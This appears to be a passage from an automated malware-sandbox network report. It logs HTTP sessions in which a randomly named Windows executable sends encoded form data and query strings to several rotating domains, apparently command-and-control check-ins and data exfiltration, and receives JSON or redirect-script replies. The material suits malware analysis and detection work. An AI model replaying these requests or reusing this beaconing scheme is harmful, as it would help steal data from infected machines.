                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.64973438.47.158.21580280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:53.795146942 CEST479OUTGET /g67v/?mB=rL4lP&GBbljTO=c8M7uxZhudpInUsrkR2DFEXxpEFo+k2F1tpwZ/KeEHHRQR8ISdL3H7dZekm83GXANV8iiloQGx74ti2jjfGNAYcI3yUU4CBSy8RpmuksmnDwDcPq/qJ2CnRI4iJcuZj+GnE/ihc= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.jl800.vip
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:03:54.622292042 CEST778INHTTP/1.1 200 OK
                                                          Date: Tue, 02 Jul 2024 12:03:54 GMT
                                                          Content-Type: application/json;charset=utf8;
                                                          Content-Length: 62
                                                          Connection: close
                                                          Set-Cookie: http_waf_cookie=667bde18-f8ff-48dc4397b3eeecd0a1a10e7eaa2b6f5fec5b; Expires=1719929034; Path=/; HttpOnly
                                                          Set-Cookie: acw_tc=ac11000117199218344752210e01975ead3549bc6260b9708aa2d5c41a46ce;path=/;HttpOnly;Max-Age=1800
                                                          jckl: XleUEhsciTB26Iz8yOSRqW+XQz3zJfF4GxXFCElsZyPqND3PLfO8oPi0MGZrhViWEqUS2RGYemgTC0t9DshQNw==
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          X-Request-Id: 86f8bd71800cd79dc840d73e54eafc14
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.6497353.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:59.661139011 CEST764OUTPOST /frbh/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.theridleysuk.co.uk
                                                          Origin: http://www.theridleysuk.co.uk
                                                          Referer: http://www.theridleysuk.co.uk/frbh/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4e 5a 53 50 71 31 61 54 2b 42 62 57 49 38 4a 6a 62 62 4e 44 70 49 4e 55 53 56 46 55 6e 6a 2f 4b 32 2f 4a 6a 52 67 4c 30 62 78 7a 4e 68 41 4b 74 4b 6c 61 59 58 2b 68 75 6d 6d 31 48 42 47 31 75 70 78 71 48 68 71 4b 68 70 56 44 35 49 6e 49 62 6c 79 62 4c 73 43 6e 70 6b 4b 50 64 5a 77 6d 42 46 47 42 44 66 56 54 50 31 39 4a 6b 72 2b 2f 53 4e 76 63 4f 33 53 79 6a 51 6b 6f 4d 4d 56 56 38 43 47 47 46 48 48 76 5a 37 42 45 38 65 5a 44 32 41 34 59 49 78 4d 53 4b 5a 68 4c 42 6e 63 32 66 33 61 34 48 53 46 48 61 53 73 56 63 57 4b 66 68 68 75 46 68 4a 70 39 75 52 53 54 78 75 77 5a 46 31 36 78 6d 34 67 63 38 48 6f 4b 37
                                                          Data Ascii: GBbljTO=NZSPq1aT+BbWI8JjbbNDpINUSVFUnj/K2/JjRgL0bxzNhAKtKlaYX+humm1HBG1upxqHhqKhpVD5InIblybLsCnpkKPdZwmBFGBDfVTP19Jkr+/SNvcO3SyjQkoMMVV8CGGFHHvZ7BE8eZD2A4YIxMSKZhLBnc2f3a4HSFHaSsVcWKfhhuFhJp9uRSTxuwZF16xm4gc8HoK7


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.6497363.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:02.203135967 CEST788OUTPOST /frbh/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.theridleysuk.co.uk
                                                          Origin: http://www.theridleysuk.co.uk
                                                          Referer: http://www.theridleysuk.co.uk/frbh/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4e 5a 53 50 71 31 61 54 2b 42 62 57 49 63 5a 6a 49 4d 5a 44 76 6f 4e 58 4d 46 46 55 70 7a 2f 30 32 2f 46 6a 52 68 2f 6b 62 6a 6e 4e 67 67 36 74 4c 6b 61 59 55 2b 68 75 74 47 31 65 4f 6d 31 66 70 78 6d 50 68 72 6d 68 70 56 48 35 49 6e 59 62 77 52 7a 55 73 53 6e 76 74 71 50 62 45 41 6d 42 46 47 42 44 66 56 58 68 31 39 42 6b 72 74 6e 53 66 36 77 50 72 43 79 6b 47 55 6f 4d 64 46 56 67 43 47 47 37 48 47 79 2b 37 43 38 38 65 59 7a 32 41 4e 30 4c 6b 63 53 49 64 68 4b 46 33 64 76 33 34 72 4e 63 64 32 66 58 54 75 78 66 58 38 65 37 39 64 46 43 62 35 64 73 52 51 4c 44 75 51 5a 76 33 36 4a 6d 71 33 51 62 49 63 76 59 2b 43 6a 37 69 35 69 34 5a 6c 63 35 72 5a 78 30 31 62 70 6e 77 77 3d 3d
                                                          Data Ascii: GBbljTO=NZSPq1aT+BbWIcZjIMZDvoNXMFFUpz/02/FjRh/kbjnNgg6tLkaYU+hutG1eOm1fpxmPhrmhpVH5InYbwRzUsSnvtqPbEAmBFGBDfVXh19BkrtnSf6wPrCykGUoMdFVgCGG7HGy+7C88eYz2AN0LkcSIdhKF3dv34rNcd2fXTuxfX8e79dFCb5dsRQLDuQZv36Jmq3QbIcvY+Cj7i5i4Zlc5rZx01bpnww==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.6497373.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:04.733908892 CEST1801OUTPOST /frbh/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.theridleysuk.co.uk
                                                          Origin: http://www.theridleysuk.co.uk
                                                          Referer: http://www.theridleysuk.co.uk/frbh/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4e 5a 53 50 71 31 61 54 2b 42 62 57 49 63 5a 6a 49 4d 5a 44 76 6f 4e 58 4d 46 46 55 70 7a 2f 30 32 2f 46 6a 52 68 2f 6b 62 6a 66 4e 67 54 79 74 4a 44 6d 59 62 65 68 75 78 57 31 44 4f 6d 31 34 70 78 4f 4c 68 72 36 58 70 51 62 35 49 46 67 62 30 51 7a 55 6e 53 6e 76 79 36 50 65 5a 77 6d 75 46 47 78 66 66 56 48 68 31 39 42 6b 72 73 58 53 63 76 63 50 37 79 79 6a 51 6b 6f 51 4d 56 56 45 43 47 75 4e 48 47 33 4a 37 79 63 38 65 34 6a 32 54 72 41 4c 6c 38 53 57 61 68 4b 6a 33 64 54 6f 34 72 68 51 64 31 43 38 54 74 74 66 58 36 76 69 74 38 35 38 4f 36 46 52 44 68 72 35 71 33 46 74 79 35 4a 34 76 6d 4d 52 41 4e 43 36 35 58 66 53 70 4a 72 56 58 6a 73 72 6b 63 67 36 77 62 78 69 75 38 58 73 63 77 2f 75 58 6d 65 6c 76 4c 70 6b 31 6e 44 2f 68 52 70 7a 67 57 65 4c 43 58 6b 4a 51 70 57 6b 68 79 32 4e 6b 2f 77 6b 76 45 79 34 54 67 48 4d 48 47 55 33 34 36 2b 30 4d 53 47 41 73 79 77 4e 34 56 47 37 76 77 65 6f 30 78 6d 6b 6e 6e 71 6d 31 66 64 6e 70 6b 35 72 73 67 33 31 44 44 42 31 61 37 6e 56 44 64 [TRUNCATED]
                                                          Data Ascii: GBbljTO=NZSPq1aT+BbWIcZjIMZDvoNXMFFUpz/02/FjRh/kbjfNgTytJDmYbehuxW1DOm14pxOLhr6XpQb5IFgb0QzUnSnvy6PeZwmuFGxffVHh19BkrsXScvcP7yyjQkoQMVVECGuNHG3J7yc8e4j2TrALl8SWahKj3dTo4rhQd1C8TttfX6vit858O6FRDhr5q3Fty5J4vmMRANC65XfSpJrVXjsrkcg6wbxiu8Xscw/uXmelvLpk1nD/hRpzgWeLCXkJQpWkhy2Nk/wkvEy4TgHMHGU346+0MSGAsywN4VG7vweo0xmknnqm1fdnpk5rsg31DDB1a7nVDdfrnX2Qzj9ulgXVylTnPJrx27drtqN8/Pfr530ZhovnHE8RSKJPd08YhGAxQo+aPUjVGz0/bLQGuvWZPiJog/3+VbCnBQSCVjizFUoZcG66kip+OyGhgYDxGGgKYwMkke8x7v1nIgqs1NJX+og/b534j0sXy3Zy1BW4xJpcFJNkt1parizCwYsP9UqHYD9Oi62Ja1OEBmqdqTcQEeAEcSogJd9RdYBoOYduASybDSfFnsK0z5ohCa0HKF0/n0Ma4wvC5y02R+mADQwWz8rczgQX0qbktfFhpbmik5cjkkGKQ9C+Fga8s5jPzoZ74/HUHFc3r33AyFkbxtBDrUzEFPavyqtPgsiiLLVvT3Qxl9fhQfQjpDxc7xXJWi4kmUPJJtBYe3PY+6MUUdItX/OGC9D7jccdvU3r2HLAZbhUecDTQEM4Qb40EXFNlgzGjiBqyL7q8e9w9bedj9rlEQCQT3UG1ouUIGOKH9CoXDnVmx7frqnBAypRxaQRs26FNCNhlYizJm4McO5TtS3HjYjv2t4rJwqi0yFvQy1g+/mG3BSADWOOxHQgWcCMFjMZLX6z/3GadwmArFigUJPEamVegqQiH85Y4jkjNzMZgjHO8Rru5uxVzln0JRw2etFgKReWt6kkQEi/TrWphyAZFreve4htbyAz22s9xLdM [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.6497383.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:07.263535976 CEST488OUTGET /frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.theridleysuk.co.uk
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:04:07.741681099 CEST408INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 02 Jul 2024 12:04:07 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 268
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 42 62 6c 6a 54 4f 3d 41 62 36 76 70 44 53 4b 32 42 72 77 65 37 35 4a 5a 6f 4d 79 71 61 4d 76 44 48 73 41 6b 43 50 41 32 50 39 4f 55 44 58 57 41 7a 54 58 71 52 2b 66 64 6c 61 54 51 76 56 66 67 57 34 68 4f 42 4a 65 70 41 71 6b 6d 62 37 77 6b 31 33 43 49 57 6b 53 2b 78 6a 58 78 67 76 66 6e 74 58 59 62 7a 62 4d 59 6a 42 73 44 58 62 6e 32 4d 35 79 72 76 72 2b 64 39 4e 70 2f 6e 43 66 48 42 51 30 65 56 35 66 44 41 61 4e 47 52 4d 3d 26 6d 42 3d 72 4c 34 6c 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.6497403.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:12.790901899 CEST770OUTPOST /a7b7/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.dexiangovernment.org
                                                          Origin: http://www.dexiangovernment.org
                                                          Referer: http://www.dexiangovernment.org/a7b7/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 62 44 48 42 4c 2b 4d 39 63 72 54 44 34 2f 6f 7a 6c 34 42 62 4c 2b 46 73 78 70 53 4a 41 59 30 4c 46 31 75 34 63 33 56 4f 4e 37 4c 5a 75 6a 4e 78 6e 47 53 58 79 42 63 61 67 76 79 44 31 44 51 70 6e 72 65 5a 57 47 6c 4c 63 56 71 45 6f 34 75 51 63 4d 2f 38 71 4e 56 6c 79 66 66 36 79 61 53 31 6a 64 33 30 6b 4f 47 7a 51 2f 4c 46 58 73 6d 50 76 34 4b 75 74 6e 57 32 30 74 70 63 73 55 73 30 79 61 52 41 43 66 66 55 71 30 30 4c 44 62 5a 61 69 67 57 30 55 59 54 6a 4e 75 68 75 2b 64 48 70 4d 49 58 44 4e 65 5a 5a 64 61 55 2b 49 4e 6f 6d 75 47 48 6f 7a 35 56 70 67 37 42 68 2f 2f 55 77 56 79 4f 39 69 77 55 7a 62 72 47 35
                                                          Data Ascii: GBbljTO=bDHBL+M9crTD4/ozl4BbL+FsxpSJAY0LF1u4c3VON7LZujNxnGSXyBcagvyD1DQpnreZWGlLcVqEo4uQcM/8qNVlyff6yaS1jd30kOGzQ/LFXsmPv4KutnW20tpcsUs0yaRACffUq00LDbZaigW0UYTjNuhu+dHpMIXDNeZZdaU+INomuGHoz5Vpg7Bh//UwVyO9iwUzbrG5


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.6497413.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:15.330939054 CEST794OUTPOST /a7b7/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.dexiangovernment.org
                                                          Origin: http://www.dexiangovernment.org
                                                          Referer: http://www.dexiangovernment.org/a7b7/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 62 44 48 42 4c 2b 4d 39 63 72 54 44 2b 66 59 7a 6f 35 42 62 61 75 46 72 74 5a 53 4a 53 59 30 50 46 79 6d 34 63 79 30 44 4e 4f 62 5a 75 47 70 78 6d 48 53 58 68 78 63 61 6f 50 79 61 6f 7a 51 79 6e 72 54 6b 57 43 74 4c 63 56 2b 45 6f 35 65 51 63 39 2f 2f 6f 64 56 6a 36 2f 66 34 32 61 53 31 6a 64 33 30 6b 4f 43 5a 51 2f 44 46 58 66 2b 50 67 36 79 74 6b 48 57 31 38 4e 70 63 39 45 73 77 79 61 52 59 43 65 43 35 71 32 4d 4c 44 5a 52 61 6a 30 4b 7a 44 6f 53 4a 43 4f 67 69 77 59 6e 6a 46 61 6e 65 4b 4e 74 39 43 6f 6f 62 41 62 70 38 79 31 48 4c 68 70 31 72 67 35 5a 54 2f 66 55 61 58 79 32 39 77 6e 59 55 55 66 6a 61 50 2f 73 7a 2b 6e 36 72 37 70 30 55 36 61 49 4f 74 63 64 61 54 77 3d 3d
                                                          Data Ascii: GBbljTO=bDHBL+M9crTD+fYzo5BbauFrtZSJSY0PFym4cy0DNObZuGpxmHSXhxcaoPyaozQynrTkWCtLcV+Eo5eQc9//odVj6/f42aS1jd30kOCZQ/DFXf+Pg6ytkHW18Npc9EswyaRYCeC5q2MLDZRaj0KzDoSJCOgiwYnjFaneKNt9CoobAbp8y1HLhp1rg5ZT/fUaXy29wnYUUfjaP/sz+n6r7p0U6aIOtcdaTw==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.6497423.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:17.874100924 CEST1807OUTPOST /a7b7/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.dexiangovernment.org
                                                          Origin: http://www.dexiangovernment.org
                                                          Referer: http://www.dexiangovernment.org/a7b7/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 62 44 48 42 4c 2b 4d 39 63 72 54 44 2b 66 59 7a 6f 35 42 62 61 75 46 72 74 5a 53 4a 53 59 30 50 46 79 6d 34 63 79 30 44 4e 4f 54 5a 76 77 31 78 6e 6b 4b 58 77 42 63 61 70 50 79 48 6f 7a 51 7a 6e 76 2f 67 57 43 70 39 63 57 47 45 6f 61 57 51 65 50 48 2f 68 64 56 6a 34 2f 66 35 79 61 53 61 6a 64 48 4f 6b 4f 53 5a 51 2f 44 46 58 65 4f 50 70 49 4b 74 6f 6e 57 32 30 74 70 59 73 55 73 59 79 61 4a 49 43 65 47 50 70 46 45 4c 47 4a 68 61 75 68 57 7a 42 49 54 76 57 75 68 2f 77 59 69 35 46 65 4f 79 4b 4e 70 48 43 6f 63 62 44 4e 55 33 68 42 33 73 39 5a 70 66 33 4c 6c 34 2f 4a 45 4d 51 78 36 39 33 78 42 69 53 4e 62 68 4a 36 77 4b 79 57 44 36 75 71 30 46 78 73 70 4a 37 76 5a 54 45 42 56 79 79 46 33 45 37 2f 44 67 67 6f 4e 6c 76 6b 57 46 48 4b 30 6f 64 55 35 43 42 43 51 62 54 78 4f 4a 62 76 78 6c 45 4f 2f 75 74 34 4f 5a 6e 37 6e 49 68 4f 6d 6b 64 4c 51 71 73 4b 46 52 36 44 55 75 79 72 6f 6f 46 49 39 67 69 6a 7a 58 6c 6f 2f 39 59 67 74 6c 6a 2f 35 6d 31 55 72 54 6a 35 54 58 66 68 78 5a 4a 41 [TRUNCATED]
                                                          Data Ascii: GBbljTO=bDHBL+M9crTD+fYzo5BbauFrtZSJSY0PFym4cy0DNOTZvw1xnkKXwBcapPyHozQznv/gWCp9cWGEoaWQePH/hdVj4/f5yaSajdHOkOSZQ/DFXeOPpIKtonW20tpYsUsYyaJICeGPpFELGJhauhWzBITvWuh/wYi5FeOyKNpHCocbDNU3hB3s9Zpf3Ll4/JEMQx693xBiSNbhJ6wKyWD6uq0FxspJ7vZTEBVyyF3E7/DggoNlvkWFHK0odU5CBCQbTxOJbvxlEO/ut4OZn7nIhOmkdLQqsKFR6DUuyrooFI9gijzXlo/9Ygtlj/5m1UrTj5TXfhxZJAo4vYedDpNj5xnYoCtU1ueUtZp3CH7cElp6jAjRWcAZewcxkxSWSqKaqrafk7yKkzv0fnA1ZdqaOvY653+MXHe1FNynwoix3dHGfeH93Nsoziq1ipw/DzAOKBM3TK68hJgNZRUXp/LWBd+HXtDu+KO/VT25nDgC6tR718OA0RCva9w7qi+u+fcqIzACCzDbOfmzGZJyiRxxUEB3ovS3DtbGpT+N+LeUebsOLIuiVz4YKMdujp99ISQMsTMX9uUxl+bynjjcxqFuaA6rrmNC/MxmKipwl+99V/0mjVHWqmgF7U2zbhWVVaS4iTJ0t98fkTuT0G5UFoaTX65CefVFmwYmFBbD1OBgxpAYxtemeifSHQFRGmTjF0TIr0xhJYa80uefY9vj6+pFMCYjSiathMJLgtnj7X2HKC1PTjpKOghx8C/ht9tot4k4b3yvHfVQKUnO6zOlJGIAPEGWbRf550knstiTIECY6xl9nbTHUJ8yMF9YRtQ032uI4YfkdQg6eKjdbP9NUe5Bu+u6T9ci7prOZft472BE7qtiqniz/aLIWENz8BJELsC1xq7D5U3RGjDhozXUUd/rTCVuSI52IN/fFv26afxqzmQY4AGbkDcUtyELy3Eq1ttSMlfwsK/EaCqBpxyNf4chy58FmSdgCzq3+psjqOeNm/et [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.6497433.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:20.406029940 CEST490OUTGET /a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.dexiangovernment.org
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:04:20.890474081 CEST408INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 02 Jul 2024 12:04:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 268
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 42 3d 72 4c 34 6c 50 26 47 42 62 6c 6a 54 4f 3d 57 42 76 68 49 4a 73 69 53 5a 2f 4d 70 66 38 76 73 70 4a 72 57 2f 34 70 6a 70 4c 4b 44 4a 59 67 61 32 69 6e 57 57 78 63 41 61 72 6e 6d 6a 74 35 35 6c 6d 42 75 77 67 38 74 62 37 6c 68 44 67 6a 30 70 2f 6b 4d 30 73 61 62 58 2f 45 68 37 6e 78 54 65 72 39 32 70 56 56 34 76 48 77 39 4e 6e 34 72 4f 48 30 31 4f 53 7a 52 4f 79 33 44 64 32 41 6c 49 47 47 70 53 61 37 2b 38 73 2b 2b 32 34 78 38 65 64 69 50 71 51 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ="}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.64974415.197.142.17380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:04:25.953110933 CEST752OUTPOST /b2v9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.autonomyai.xyz
                                                          Origin: http://www.autonomyai.xyz
                                                          Referer: http://www.autonomyai.xyz/b2v9/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
